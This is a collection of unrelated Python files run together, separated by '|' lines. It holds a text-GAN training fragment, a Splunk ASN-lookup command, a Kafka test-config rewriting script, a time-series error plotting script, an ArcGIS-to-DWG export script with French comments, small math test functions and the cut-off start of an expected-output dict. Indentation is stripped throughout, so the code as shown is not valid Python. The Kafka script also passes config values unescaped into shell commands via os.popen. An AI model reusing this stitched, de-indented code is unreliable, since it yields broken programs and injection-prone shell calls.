:param if_list2tensor_quick_computation: when we have different length seq, we do the padding and unification
:return:
"""
total_loss = 0
num_batches = 0
# ==== condition 0 ====: we compute the hidden from previous one long tensor
if compute_hidden and not if_relevancy_attention_aware_context:
for index in range(0, len(data_loader), cfg.batch_size):
# print(index)
# ensure the valid indexing
if (index + cfg.batch_size) <= len(data_loader):
num_batches += 1
one_data_batch = data_loader[index: index+cfg.batch_size]
# present 2: more universal solution
if if_one_hot_in_one_batch_in_malcom_exp:
# F.one_hot(i, cfg.extend_vocab_size).float()
inp = torch.cat([F.one_hot(one_dict['input'], cfg.extend_vocab_size).float().unsqueeze(0) for one_dict in one_data_batch], dim=0)
one_long_context = [F.one_hot(one_dict['one_long_context'], cfg.extend_vocab_size).float() for one_dict in one_data_batch]
else:
inp = torch.cat([one_dict['input'].unsqueeze(0) for one_dict in one_data_batch], dim=0)
one_long_context = [one_dict['one_long_context'] for one_dict in one_data_batch]
target = torch.cat([one_dict['target'].view(1, -1) for one_dict in one_data_batch], dim=0)
if cfg.CUDA:
inp, target = inp.cuda(), target.cuda()
# ==== compute the hiddens ====:
# every seq should already be on device
hidden = self.compute_hiddens(model, one_long_context, if_list2tensor_quick_computation=if_list2tensor_quick_computation) # batch_size*1*hidden
# ==== end ====
# by checking, the forward comes from the basic relational_rnn_general generator setting!
# print(inp.shape, hidden.shape) # batch_size*seq_len*[vocab_sizeInLinearEmbedding]
pred = model.forward(inp, hidden) # (seq_len*batch)*vocab_size
# print(inp.shape, hidden.shape, target.shape, pred.shape)
# target.view(-1) shape: (batch_size*max_len_seq)
loss = criterion(pred, target.view(-1))
# self.log.info(f"one loss in the inner train_gen_epoch mle training is {loss}") # tested pass, we can get the loss
self.optimize(optimizer, loss, model)
total_loss += loss
# self.log.info("finish one dataloader in pretraining generator")
# ==== condition 1 ====: we do not use hiiden, the same as the relgan paper
elif not compute_hidden and not if_relevancy_attention_aware_context:
for i, data in enumerate(data_loader):
inp, target = data['input'], data['target'] # batch_size*max_len_seq
assert 'one_long_context' not in data
if cfg.CUDA:
inp, target = inp.cuda(), target.cuda()
hidden = model.init_hidden(data_loader.batch_size) # batch_size*1*hidden_state
# by checking, the forward comes from the basic relational_rnn_general generator setting!
pred = model.forward(inp, hidden) # (seq_len*batch)*vocab_size
# print(inp.shape, hidden.shape, target.shape, pred.shape)
# target.view(-1) shape: (batch_size*max_len_seq)
loss = criterion(pred, target.view(-1))
# print("get the loss")
# exit(0)
self.optimize(optimizer, loss, model)
total_loss += loss
# self.log.info("finish one dataloader in pretraining generator")
# ==== condition 2 ====: we compute the attention-aware context
elif if_relevancy_attention_aware_context:
for index in range(0, len(data_loader), cfg.batch_size):
# ensure the valid indexing
if (index + cfg.batch_size) <= len(data_loader):
num_batches += 1
one_data_batch = data_loader[index: index+cfg.batch_size]
inp = torch.cat([one_dict['input'].unsqueeze(0) for one_dict in one_data_batch], dim=0) # batch_size*max_seq_len*[vocab_size]
target = torch.cat([one_dict['target'].view(1, -1) for one_dict in one_data_batch], dim=0) # batch_size*max_seq_len
if cfg.CUDA:
inp, target = inp.cuda(), target.cuda()
prev_train_seq = [one_dict['prev_train_seq'] for one_dict in one_data_batch] # batch_size length list of tensor: (num_edit-1)*max_seq_len
matched_context = [one_dict['matched_context'] for one_dict in
one_data_batch] # batch_size length list of tensor: 1*max_seq_len
match_relevancy_score = [one_dict['match_relevancy_score'] for one_dict in
one_data_batch] # batch_size length list of tensor: 1*(num_edit-1)
weighted_hiddens = self.weighted_context_computation(model, prev_train_seq, matched_context, match_relevancy_score)
# context_aware generation: # batch_size * seq-len * (hidden_dim)
pred = model.forward(inp, weighted_hiddens, context=weighted_hiddens.repeat(1, cfg.max_seq_len, 1))
loss = criterion(pred, target.view(-1))
self.optimize(optimizer, loss, model)
total_loss += loss
else:
self.log.info("**** no correct settting for training generator and exit ****")
return total_loss / len(data_loader)
def weighted_context_computation(self, model, prev_train_seq, matched_context, match_relevancy_score):
"""
we compute the attention-aware weighted sum for the testing!
:param model:
:param prev_train_seq:
:param matched_context:
:param match_relevancy_score:
:return:
"""
matched_prev_train_seq_and_context = [torch.cat([prev_train_seq[i], matched_context[i]], dim=0) for i in
range(len(prev_train_seq))] # batch_size list of tensor: num_edit*max_seq
matched_attention_score = [torch.cat([one_relevancy_score.view(1, -1), torch.ones(1, 1).to(cfg.device)], dim=1)
for one_relevancy_score in match_relevancy_score] # batch_size list: 1*(num_edit)
weighted_hiddens = [] # batch_size list of: 1*hidden
for i in range(len(matched_prev_train_seq_and_context)):
one_prev_train_seq_and_context = matched_prev_train_seq_and_context[i] # num_edit*max_seq*[vocab_size]
seq_hiddens = self.compute_hiddens(model, one_prev_train_seq_and_context).squeeze(1) # num_edit*1*hidden_dimension->num_edit*hidden_state
one_full_attention_score = matched_attention_score[i] # 1*(num_edit)
attention_weights = F.softmax(one_full_attention_score, dim=1) # 1*(num_edit)
weighted_hidden_state = torch.matmul(attention_weights, seq_hiddens) # 1*hidden_state
weighted_hiddens.append(weighted_hidden_state)
weighted_hiddens = torch.cat([one_hidden.unsqueeze(0) for one_hidden in weighted_hiddens],
dim=0) # batch_size*1*hidden
return weighted_hiddens
def train_dis_epoch(self, model, data_loader, criterion, optimizer):
total_loss = 0
total_acc = 0
total_num = 0
for i, data in enumerate(data_loader):
inp, target = data['input'], data['target']
if cfg.CUDA:
inp, target = inp.cuda(), target.cuda()
pred = model.forward(inp)
loss = criterion(pred, target)
self.optimize(optimizer, loss, model)
total_loss += loss.item()
total_acc += torch.sum((pred.argmax(dim=-1) == target)).item()
total_num += inp.size(0)
total_loss /= len(data_loader)
total_acc /= total_num
return total_loss, total_acc
def train_classifier(self, epochs):
"""
Classifier for calculating the classification accuracy metric of category text generation.
Note: the train and test data for the classifier is opposite to the generator.
Because the classifier is to calculate the classification accuracy of the generated samples
where are trained on self.train_samples_list.
Since there's no test data in synthetic data (oracle data), the synthetic data experiments
doesn't need a classifier.
"""
import copy
# Prepare data for Classifier
clas_data = CatClasDataIter(self.clas_samples_list)
eval_clas_data = CatClasDataIter(self.train_samples_list)
max_acc = 0
best_clas = None
for epoch in range(epochs):
c_loss, c_acc = self.train_dis_epoch(self.clas, clas_data.loader, self.clas_criterion,
self.clas_opt)
_, eval_acc = self.eval_dis(self.clas, eval_clas_data.loader, self.clas_criterion)
if eval_acc > max_acc:
best_clas = copy.deepcopy(self.clas.state_dict()) # save the best classifier
max_acc = eval_acc
self.log.info('[PRE-CLAS] epoch %d: c_loss = %.4f, c_acc = %.4f, eval_acc = %.4f, max_eval_acc = %.4f',
epoch, c_loss, c_acc, eval_acc, max_acc)
self.clas.load_state_dict(copy.deepcopy(best_clas)) # Reload the best classifier
@staticmethod
def eval_dis(model, data_loader, criterion):
total_loss = 0
total_acc = 0
total_num = 0
with torch.no_grad():
for i, data in enumerate(data_loader):
inp, target = data['input'], data['target']
if cfg.CUDA:
inp, target = inp.cuda(), target.cuda()
pred = model.forward(inp)
loss = criterion(pred, target)
total_loss += loss.item()
total_acc += torch.sum((pred.argmax(dim=-1) == target)).item()
total_num += inp.size(0)
total_loss /= len(data_loader)
total_acc /= total_num
return total_loss, total_acc
@staticmethod
def optimize_multi(opts, losses):
for i, (opt, loss) in enumerate(zip(opts, losses)):
opt.zero_grad()
loss.backward(retain_graph=True if i < len(opts) - 1 else False)
opt.step()
@staticmethod
def optimize(opt, loss, model=None, retain_graph=False):
opt.zero_grad()
loss.backward(retain_graph=retain_graph)
if model is not None:
torch.nn.utils.clip_grad_norm_(model.parameters(), cfg.clip_norm)
opt.step()
def show_config(self):
self.log.info(100 * '=')
self.log.info('> training arguments:')
for arg in vars(self.opt):
self.log.info('>>> {0}: {1}'.format(arg, getattr(self.opt, arg)))
self.log.info(100 * '=')
def cal_metrics(self, fmt_str=False, dictionary = None, eval_samples=None):
"""
Calculate metrics
:param fmt_str: if return format string for logging
"""
# print(f"in the call mestric, the original dictionary size is {len(self.idx2word_dict)}")
if dictionary == None:
dictionary = self.idx2word_dict
# print(f"in the call mestric, the dictionary size is {len(dictionary)}")
else:
# print("use the new dictionay in the cal_metrics computation")
# print(f"in the call mestric, the dictionary size is {len(dictionary)}")
pass
with torch.no_grad():
# Prepare data for evaluation
# added by : get it from random setting or the variable transfer!
if eval_samples == None:
eval_samples = self.gen.sample(cfg.samples_num, 4 * cfg.batch_size)
# not sure why 200, 200 in this case
gen_tokens_s = tensor_to_tokens(self.gen.sample(200, 200), dictionary)
else:
gen_tokens_s = tensor_to_tokens(eval_samples, dictionary)
gen_data = GenDataIter(eval_samples)
gen_tokens = tensor_to_tokens(eval_samples, dictionary)
# Reset metrics
self.bleu.reset(test_text=gen_tokens, real_text=self.test_data.tokens)
self.nll_gen.reset(self.gen, self.train_data.loader)
self.nll_div.reset(self.gen, gen_data.loader)
self.self_bleu.reset(test_text=gen_tokens_s, real_text=gen_tokens)
self.ppl.reset(gen_tokens)
if fmt_str:
return ', '.join(['%s = %s' % (metric.get_name(), metric.get_score()) for metric in self.all_metrics])
else:
return [metric.get_score() for metric in self.all_metrics]
def cal_metrics_with_label(self, label_i):
assert type(label_i) == int, 'missing label'
with torch.no_grad():
# Prepare data for evaluation
eval_samples = self.gen.sample(cfg.samples_num, 8 * cfg.batch_size, label_i=label_i)
gen_data = GenDataIter(eval_samples)
gen_tokens = tensor_to_tokens(eval_samples, self.idx2word_dict)
gen_tokens_s = tensor_to_tokens(self.gen.sample(200, 200, label_i=label_i), self.idx2word_dict)
clas_data = CatClasDataIter([eval_samples], label_i)
# Reset metrics
self.bleu.reset(test_text=gen_tokens, real_text=self.test_data_list[label_i].tokens)
self.nll_gen.reset(self.gen, self.train_data_list[label_i].loader, label_i)
self.nll_div.reset(self.gen, gen_data.loader, label_i)
self.self_bleu.reset(test_text=gen_tokens_s, real_text=gen_tokens)
self.clas_acc.reset(self.clas, clas_data.loader)
self.ppl.reset(gen_tokens)
return [metric.get_score() for metric in self.all_metrics]
def comb_metrics(self, fmt_str=False):
all_scores = [self.cal_metrics_with_label(label_i) for label_i in range(cfg.k_label)]
all_scores = np.array(all_scores).T.tolist() # each row for each metric
if fmt_str:
return ', '.join(['%s = %s' % (metric.get_name(), score)
for (metric, score) in zip(self.all_metrics, all_scores)])
return all_scores
def _save(self, phase, epoch, dictionary=None, prev_hiddens=None):
"""Save model state dict and generator's samples"""
if phase != 'ADV':
torch.save(self.gen.state_dict(), cfg.save_model_root + 'gen_{}_{:05d}.pt'.format(phase, epoch))
if dictionary == None:
dictionary = self.idx2word_dict
else:
pass
save_sample_path = cfg.save_samples_root + 'samples_{}_{:05d}.txt'.format(phase, epoch)
if prev_hiddens == None:
samples = self.gen.sample(cfg.batch_size, cfg.batch_size)
else:
samples = self.gen.sample(cfg.batch_size, cfg.batch_size,
hidden=prev_hiddens) # batch_size*max_len_sent*vocab_size
write_tokens(save_sample_path, tensor_to_tokens(samples, dictionary))
def update_temperature(self, i, N):
self.gen.temperature.data = torch.Tensor([get_fixed_temperature(cfg.temperature, i, N, cfg.temp_adpt)])
if cfg.CUDA:
self.gen.temperature.data = self.gen.temperature.data.cuda()
|
#!/usr/bin/env python
from splunklib.searchcommands import dispatch, GeneratingCommand, Configuration, Option, validators
import sys
import os
try:
# python2
import ConfigParser as configparser
from StringIO import StringIO as BytesIO
import urllib2 as urllib_functions
except:
# python3
import configparser
from io import BytesIO
import urllib.request as urllib_functions
from zipfile import ZipFile
import re
import socket
import struct
@Configuration(type='reporting')
class ASNGenCommand(GeneratingCommand):
def generate(self):
proxies = {'http': None, 'https': None}
maxmind = {'license_key': None}
try:
config = configparser.ConfigParser()
# first try to read the defaults (in case we are in a cluster with deployed config)
config.read(os.path.join(os.getcwd(), '../default/asngen.conf'))
# then try to read the overrides
config.read(os.path.join(os.getcwd(), '../local/asngen.conf'))
if config.has_section('proxies'):
if config.has_option('proxies', 'https'):
if len(config.get('proxies', 'https')) > 0:
proxies['https'] = config.get('proxies', 'https')
if config.has_section('maxmind'):
if config.has_option('maxmind', 'license_key'):
if len(config.get('maxmind', 'license_key')) > 0:
maxmind['license_key'] = config.get('maxmind', 'license_key')
except:
raise Exception("Error reading configuration. Please check your local asngen.conf file.")
if proxies['https'] is not None:
proxy = urllib_functions.ProxyHandler(proxies)
opener = urllib_functions.build_opener(proxy)
urllib_functions.install_opener(opener)
if maxmind['license_key'] is None:
raise Exception("maxmind license_key is required")
try:
link = "https://download.maxmind.com/app/geoip_download" + "?"
link += "edition_id=GeoLite2-ASN-CSV" + "&"
link += "license_key=" + maxmind['license_key'] + "&"
link += "suffix=zip"
url = urllib_functions.urlopen(link)
except:
raise Exception("Please check app proxy settings and license_key.")
if url.getcode()==200:
try:
zipfile = ZipFile(BytesIO(url.read()))
except:
raise Exception("Invalid zip file")
else:
raise Exception("Received response: " + url.getcode())
for name in zipfile.namelist():
entries = re.findall(b'^(\d+\.\d+\.\d+\.\d+)\/(\d+),(\d+),\"?([^\"\n]+)\"?', zipfile.open(name).read(), re.MULTILINE)
for line in entries:
yield {
'ip': line[0].decode('utf-8', 'ignore') + "/" +
line[1].decode('utf-8', 'ignore'),
'asn': line[2].decode('utf-8', 'ignore'),
'autonomous_system': line[3].decode('utf-8', 'ignore')}
dispatch(ASNGenCommand, sys.argv, sys.stdin, sys.stdout, __name__)
|
#!/usr/bin/python
import sys
import json
import os
import fnmatch
import collections
import fileinput
import re
# Settings loaded from cluster.properties file
brokers = []
brokers_target = []
zookeepers = []
zookeepers_target = []
producers = []
consumers = []
consumers_target = []
mirrormakers = []
javaHome = ""
kafkaHome = ""
zkPort = ""
secure = False
def find_files(pattern, path):
result = []
for root, dirs, files in os.walk(path):
for name in files:
if fnmatch.fnmatch(name, pattern):
result.append(os.path.join(root, name))
return result
def fix_cluster_config_files(directory):
for f in find_files("cluster_config.json", directory):
print "Processing " + f
inFile = open(f, "r")
data = json.load(inFile, object_pairs_hook=collections.OrderedDict)
inFile.close()
brokerIndx = 0
t_brokerIndx = 0
producerIndx = 0
consumerIndx = 0
t_consumerIndx = 0
mirrormakerIndx = 0
zkIndx = 0
t_zkIndx = 0
for entity in data["cluster_config"]:
if entity["role"] == "broker" and len(brokers)>0:
if "cluster_name" not in entity or entity["cluster_name"] == "source":
entity["hostname"] = brokers[brokerIndx]
brokerIndx = brokerIndx+1 if brokerIndx+1<len(brokers) else 0
elif entity["cluster_name"] == "target":
entity["hostname"] = brokers_target[t_brokerIndx]
t_brokerIndx = t_brokerIndx+1 if t_brokerIndx+1<len(brokers_target) else 0
else:
print "*** UNEXPECTED broker entity: %s" % entity
elif entity["role"] == "zookeeper" and len(zookeepers)>0:
if "cluster_name" not in entity or entity["cluster_name"] == "source":
entity["hostname"] = zookeepers[zkIndx]
zkIndx = zkIndx+1 if zkIndx+1<len(zookeepers) else 0
elif entity["cluster_name"] == "target":
entity["hostname"] = zookeepers_target[t_zkIndx]
t_zkIndx = t_zkIndx+1 if t_zkIndx+1<len(zookeepers_target) else 0
else:
print "*** UNEXPECTED ZK entity: %s" % entity
elif entity["role"] == "producer_performance" and len(producers)>0:
if "cluster_name" not in entity or entity["cluster_name"] == "source":
entity["hostname"] = producers[producerIndx]
producerIndx = producerIndx+1 if producerIndx+1<len(producers) else 0
elif entity["cluster_name"] == "target":
print "*** UNEXPECTED Target Producer: %s" % entity
elif entity["role"] == "console_consumer" and len(consumers)>0:
if "cluster_name" not in entity or entity["cluster_name"] == "source":
entity["hostname"] = consumers[consumerIndx]
consumerIndx = consumerIndx+1 if consumerIndx+1<len(consumers) else 0
elif entity["cluster_name"] == "target":
entity["hostname"] = consumers_target[t_consumerIndx]
t_consumerIndx = t_consumerIndx+1 if t_consumerIndx+1<len(consumers_target) else 0
else:
print "*** UNEXPECTED Consumer entity: %s" % entity
elif entity["role"] == "mirror_maker" and len(mirrormakers)>0:
entity["hostname"] = mirrormakers[mirrormakerIndx]
mirrormakerIndx = mirrormakerIndx+1 if mirrormakerIndx+1<len(mirrormakers) else 0
if "java_home" in entity and javaHome!="":
entity["java_home"] = javaHome
if "kafka_home" in entity and kafkaHome!="":
entity["kafka_home"] = kafkaHome
outFile = open(f, "w+")
outFile.write( json.dumps(data, indent=4, separators=(',', ': ')) )
outFile.close()
def fix_json_properties_files(directory):
for f in find_files("testcase_*_properties.json", directory):
print "Processing " + f
inFile = open(f, "r")
data = json.load(inFile, object_pairs_hook=collections.OrderedDict)
inFile.close()
changed = False
for entity in data["entities"]:
if "zookeeper" in entity:
entity["zookeeper"] = zookeepers[0] + ":" + zkPort
changed = True
if changed:
outFile = open(f, "w+")
outFile.write( json.dumps(data, indent=4, separators=(',', ': ')) )
outFile.close()
def fix_other_properties_file(directory):
if len(zookeepers) == 0:
return
for f in find_files("*.properties", directory):
print "Processing " + f
fname = os.path.basename(f)
if fname == "mirror_consumer.properties":
os.popen("perl -i -pe 's/zookeeper.connect=.*/zookeeper.connect=" + zookeepers_target[0] + "/' " + f).read()
elif fname == "mirror_producer.properties":
os.popen("perl -i -pe 's/metadata.broker.list=.*/metadata.broker.list=" + ",".join(brokers) + "/' " + f ).read()
print os.popen("perl -i -pe 's/bootstrap.servers=.*/bootstrap.servers=" + ",".join(brokers) + "/' " + f ).read()
else:
os.popen("perl -i -pe 's/zookeeper.connect=localhost:.*/zookeeper.connect=" + zookeepers[0] + ":" + zkPort + "/' " + f).read()
os.popen("perl -i -pe 's/zk.connect=localhost:.*/zk.connect=" + zookeepers[0] + ":" + zkPort + "/' " + f).read()
if re.search("zookeeper.*properties", fname):
# print os.popen("perl -i -pe 's/server.1=localhost/server.1=" + zookeepers[0] + "/' " + f).read()
if secure:
with open(f, "a") as zkConf:
zkConf.write("\nauthProvider.1=org.apache.zookeeper.server.auth.SASLAuthenticationProvider")
zkConf.write("\njaasLoginRenew=3600000")
zkConf.write("\nkerberos.removeHostFromPrincipal=true")
zkConf.write("\nkerberos.removeRealmFromPrincipal=true\n")
if secure and fname == "server.properties":
with open(f, "a") as brokerconf:
brokerconf.write("\nsuper.users=User:kafka")
brokerconf.write("\nprincipal.to.local.class=kafka.security.auth.KerberosPrincipalToLocal")
brokerconf.write("\nauthorizer.class.name=kafka.security.auth.SimpleAclAuthorizer")
brokerconf.write("\nsecurity.inter.broker.protocol=SASL_PLAINTEXT\n")
if secure and (fname == "producer.properties" or fname == "producer_performance.properties" or fname == "consumer.properties"):
with open(f, "a") as producerconf:
producerconf.write("\nsecurity.protocol=SASL_PLAINTEXT\n")
def loadClusterProperties(clusterProp):
inFile = open(clusterProp, "r")
data = json.load(inFile)
inFile.close()
global kafkaHome, javaHome, zkPort, zookeepers, producers, consumers, brokers, secure
if not "zookeepers" in data:
print >> sys.stderr, "'zookeepers' list not specified"
else:
for zk in data["zookeepers"]:
zookeepers.append(zk)
if not "zookeepers_target" in data:
print >> sys.stderr, "'zookeepers_target' list not specified"
else:
for zk in data["zookeepers_target"]:
zookeepers_target.append(zk)
if not "brokers" in data:
print >> sys.stderr, "'brokers' list not specified"
else:
for b in data["brokers"]:
brokers.append(b)
if not "brokers_target" in data:
print >> sys.stderr, "'brokers_target' list not specified"
else:
for b in data["brokers_target"]:
brokers_target.append(b)
if not "producers" in data:
print >> sys.stderr, "'producers' list not specified"
else:
for p in data["producers"]:
producers.append(p)
if not "mirrormakers" in data:
print >> sys.stderr, "'mirrormakers' list not specified"
else:
for m in data["mirrormakers"]:
mirrormakers.append(m)
if not "zkPort" in data:
print >> sys.stderr, "'zkPort' not specified"
else:
zkPort = data["zkPort"]
if not "consumers" in data:
print >> sys.stderr, "'consumers' list not specified"
else:
for c in data["consumers"]:
consumers.append(c)
if not "consumers_target" in data:
print >> sys.stderr, "'consumers_target' list not specified"
else:
for c in data["consumers_target"]:
consumers_target.append(c)
if not "javaHome" in data:
print >> sys.stderr, "'javaHome' not specified"
else:
javaHome = data["javaHome"]
if not "kafkaHome" in data:
print >> sys.stderr, "'kafaHome' not specified"
else:
kafkaHome = data["kafkaHome"]
if not "secure" in data:
secure = False
else:
secure = True if data['secure'] else False
print "**** SECURE MODE = %s ****" % secure
# Main
def usage():
print "Usage :"
print sys.argv[0] + " cluster.json testsuite_dir/"
if not len(sys.argv) == 3:
usage()
exit(1)
clusterProp = sys.argv[1]
directory = sys.argv[2] # "./system_test/offset_management_testsuite"
loadClusterProperties(clusterProp)
print "-Kafka Home: " + kafkaHome
print "-Java Home: " + javaHome
print "-ZK port : " + zkPort
print "-Consumers : " + ",".join( consumers )
print "-Consumers (Target): " + ",".join( consumers_target )
print "-Producers : " + ",".join( producers )
print "-Brokers : " + ",".join( brokers )
print "-Brokers (Target): " + ",".join( brokers_target )
print "-Mirror Makers : " + ",".join( mirrormakers )
print "-Zookeepers : " + ",".join( zookeepers )
print "-Zookeepers (Target): " + ",".join( zookeepers_target )
print "-Secure : %s " % secure
# 1 Update all cluster_config.json files
fix_cluster_config_files(directory)
# 2 Update testcase_*_properties.json files
fix_json_properties_files(directory)
# 3 fix role specific property files
fix_other_properties_file(directory)
|
import numpy as np
import matplotlib.pylab as plt
def getErrors(fname):
errors = np.loadtxt(fname)
test_len = int(errors.shape[1]/2)
ite = errors.shape[0]
L= np.arange(test_len)
x_real = errors[:,:test_len]
x_pred = errors[:,test_len:]
rmse = np.sqrt(np.mean((x_real-x_pred)**2,axis=0))
nmse = np.zeros(test_len)
for i in range(test_len):
part1 = np.sum((x_real[:,i]-x_pred[:,i])**2)
part2 = np.sum((x_real[:,i]-np.mean(x_real[:,i]))**2)
nmse[i] = part1/part2
error = x_real-x_pred
std = np.std(error,axis=0)
return x_pred,x_real,rmse,nmse,std,L
x_pred,x_real,rmse,nmse,std,L = getErrors('./result/mackeyglass/error_x.txt')
print("nmse",nmse[L])
print("rmse",rmse[L])
print("std",std[L])
plt.figure(0)
plt.subplot(2,2,1)
plt.plot(x_real[:,L[0]],label="Actural x")
plt.plot(x_pred[:,L[0]],label="1 step prediction")
plt.xlabel('N',fontsize=12)
plt.legend()
plt.subplot(2,2,2)
plt.plot(x_real[:,L[19]],label="Actural x")
plt.plot(x_pred[:,L[19]],label="20 step prediction")
plt.xlabel('N',fontsize=12)
plt.legend()
plt.subplot(2,2,3)
plt.plot(x_real[:,L[39]],label="Actural x")
plt.plot(x_pred[:,L[39]],label="40 step prediction")
plt.xlabel('N',fontsize=12)
plt.legend()
plt.subplot(2,2,4)
plt.plot(x_real[:,L[79]],label="Actural x")
plt.plot(x_pred[:,L[79]],label="80 step prediction")
plt.xlabel('N',fontsize=12)
plt.legend()
plt.figure(1)
print(L[:])
_,_,rmse_vr0,_,_,_ = getErrors('./result/mackeyglass/error_x_5_5_vr=0.txt')
_,_,rmse_55,_,_,_ = getErrors('./result/mackeyglass/error_x_5_5.txt')
_,_,rmse_75,_,_,_ = getErrors('./result/mackeyglass/error_x_7_5.txt')
#plt.plot(L[:40]+1,rmse[L[:40]],label="rmse lolimot")
plt.plot(L[:40]+1,rmse_vr0[L[:40]],label="rmse r=5 q=5 vr=0")
plt.plot(L[:40]+1,rmse_55[L[:40]],label="rmse r=5 q=5")
plt.plot(L[:40]+1,rmse_75[L[:40]],label="rmse r=7 q=5")
#plt.xticks([0,2,4,6,8,10])
plt.xlabel('N',fontsize=12)
plt.legend()
plt.figure(2)
plt.subplot(2,1,1)
plt.title("MultiStep prediction of Lorenz system")
plt.plot(x_real[500,L],label="real x")
plt.plot(x_pred[500,L],label="prediction x")
plt.legend()
plt.subplot(2,1,2)
plt.title("Error")
plt.plot(x_real[500,L]-x_pred[500,L])
plt.show()
|
# -*- coding: utf-8 -*-
# Name: GdbToDWG.py
# Description: Export vers un beau DWG
# Author: mav
# To Do : remplacer la gdb temporaire par in_memory
# Import system modules
import arcpy, os, datetime
# from arcpy import env
# Début du minutage, hors import des modules
now = datetime.datetime.now()
# Définition des variables globales
# Chemins d'accès
input_gdb_folder = r"D:\99_Tmp\1_Operations\Laburets"
input_gdb = "Topo_Travail.gdb"
input_gdb_path = os.path.join(input_gdb_folder, input_gdb)
output_gdb_folder = r"D:\99_Tmp"
output_gdb = "TmpToDWG.gdb"
output_gdb_path = os.path.join(output_gdb_folder, output_gdb)
gabarit_dao_path = r"D:\90_Param\ArcGIS\Scripts\Gdb2Cad\Export_200_CC47.dwg"
output_dao = "OperationArcheo.dwg"
output_dao_path = os.path.join(input_gdb_folder, output_dao)
# CE à exporter vers le DWG
ceAExporter = [u'CFSd_Pgn', u'CFSd_Pln', u'CpRp_Pln', u'Emprise_Pgn', u'FUS_Bord_Pln', u'FUS_Pgn', u'FUS_Pln', u'Topo_Pgn', u'Topo_Pln', u'Topo_Pts', u'Topo_Stations']
# CE avec un champ 'ACTIF' à utiliser pour filtrer
ceAFiltrer = [u'CFSd_Pgn', u'CFSd_Pln', u'Emprise_Pgn', u'FUS_Pgn', u'FUS_Pln', u'Topo_Pgn', u'Topo_Pln']
# Création de la géodatabase fichier temporaire
if arcpy.Exists(output_gdb_path):
print u"Suppression de la précédente géodatabase temporaire..."
arcpy.Delete_management(output_gdb_path)
print u"Géodatabase temporaire précédente supprimée."
print u"Création de la géodatabase temporaire..."
arcpy.CreateFileGDB_management (output_gdb_folder, output_gdb)
print u"Géodatabase temporaire créée !\n"
# Définition de la Gdb du chantier comme espace de travail par défaut
# Cela permet d'énumérer les CE facilement.
arcpy.env.workspace = input_gdb_path
# Création de la liste des classes d'entités en entrée
fcList = arcpy.ListFeatureClasses()
# On parcourt la gdb à la recherche des CE conventionnelles.
# Leur absence ne cause ainsi pas d'erreur.
for fc in fcList:
if fc in ceAExporter:
output_fc = os.path.join(output_gdb_path, fc)
print u'Copie de ' + fc + '...'
arcpy.Copy_management(fc, output_fc)
print fc + u' a été copié.'
print u"Tout a été copié !\n"
del fc, fcList
# Définition de la Gdb temporaire comme espace de travail par défaut
# On pourrait peut-être utiliser à la place ceAExporter...
# -> vérifier si erreur en cas d'absence d'une CE
arcpy.env.workspace = output_gdb_path
fcList = arcpy.ListFeatureClasses()
# Ajout des champs DAO
print u"Ajout et calcul des champs DAO aux classes d'entités..."
for fc in fcList:
print u'Traitement de ' + fc + '...'
arcpy.AddField_management(fc, "Layer", "TEXT")
# Pour les points topo, traitement spécifique
if fc in ["Topo_Pts","Topo_Stations"]:
arcpy.AddField_management(fc, "CadType", "TEXT")
arcpy.AddField_management(fc, "RefName", "TEXT")
# Permet l'insertion des points en tant que bloc "point topo"
arcpy.CalculateField_management(fc, "CadType", "'INSERT'", "PYTHON_9.3")
# On définit l'attribut "ALT" des bloc AutoCAD TopoPoint et TopoStation
arcpy.AlterField_management(fc, "Z", "ALT")
if fc == "Topo_Pts":
# On nomme ici le bloc "point topo" inséré dans le gabarit DAO
arcpy.CalculateField_management(fc, "RefName", "'TopoPoint'", "PYTHON_9.3")
# On définit les attributs du bloc "point topo", ici MAT, ALT et COD
arcpy.AlterField_management(fc, "PT_ID", "MAT")
arcpy.AlterField_management(fc, "ATT1", "COD")
arcpy.CalculateField_management(fc, "Layer", "'Point topo - ' + !CODE_DESCR!", "PYTHON_9.3")
else: # fc=="Topo_Stations"
# On nomme ici le bloc "station" inséré dans le gabarit DAO
arcpy.CalculateField_management(fc, "RefName", "'TopoStation'", "PYTHON_9.3")
# On définit les attributs du bloc "station topo", ici MAT et COD
arcpy.AlterField_management(fc, "Matricule", "MAT")
arcpy.AlterField_management(fc, "Observation", "COD")
arcpy.CalculateField_management(fc, "Layer", "'Station topo'", "PYTHON_9.3")
elif fc == "FUS_Bord_Pln":
arcpy.CalculateField_management(fc, "Layer", "!LEGENDE!", "PYTHON_9.3")
else:
arcpy.CalculateField_management(fc, "Layer", "!CODE_DESCR!", "PYTHON_9.3")
print u"Attributs DAO pour " + fc + u" ajoutés."
print u"Champs DAO ajoutés aux classes d'entités et calculés.\n"
# Export DXF/DWG
# Attention c'est le gabarit qui définit le format de fichier (DWG/DXF,version)
# mais sans modifier l'extension
print u"Génération du fihier DAO..."
arcpy.ExportCAD_conversion(fcList, "DWG_R2007", output_dao_path,"Ignore_Filenames_in_Tables","Append_To_Existing_Files", gabarit_dao_path)
later = datetime.datetime.now()
elapsed = later - now
print(u'Le fichier DAO a été généré en {} secondes.').format(elapsed)
# except Exception as err:
# arcpy.AddError(err)
# print err
|
# -*- coding: utf-8 -*-
"""
Created on Tue Feb 10 13:14:38 2015
@author: djc@thinksysinc.com
A collection of test functions used to check some basic math in the Python
interface
"""
import math
# A square root function
def sqrt(a):
retval = -1.0;
if a >= 0:
retval = math.sqrt(a);
return retval;
# A basic math test function
def add(a,b):
return a + b;
# Test function for multiple real outputs
def addVerbose(a,b):
return a, b, a + b;
# Test function for multiple putputs that does something useful
def cross(a, b, c, x, y, z):
rx = b * z - c * y
ry = c * x - a * z
rz = a * y - b * x
return rx, ry, rz
# Test function for multiple putputs that does something useful
def crossArray(a, b, c, x, y, z):
rx = b * z - c * y
ry = c * x - a * z
rz = a * y - b * x
return [rx, ry, rz]
# Compute the magnitude of a 3-vector
def magnitude(a, b, c):
return sqrt(a**2 + b**2 + c**2)
# Compute the magnitude of a cross product
def crossmag(a, b, c, x, y, z):
data = cross(a, b, c, x, y, z)
return magnitude(data[0], data[1], data[2])
"""
This function takes a 6 element input vector and builds the 3x3 wedge product,
using the first 3 elements if the input as the first vector and the remaining
elements as the second
Test function for the return of a list of lists
"""
def anticross(arr):
am = []
am.append([0,arr[0]*arr[4] - arr[1]*arr[3], arr[0]*arr[5] - arr[2]*arr[3]])
am.append([0,0,arr[1]*arr[5] - arr[2]*arr[4]])
am.append([0,0,0])
am[1][0] = -am[0][1]
am[2][0] = -am[0][2]
am[2][1] = -am[1][2]
return am
|
expected_output = {'interfaces': {'Ethernet1/33': {'in_bcast_pkts': 0,
'in_mcast_pkts': 64,
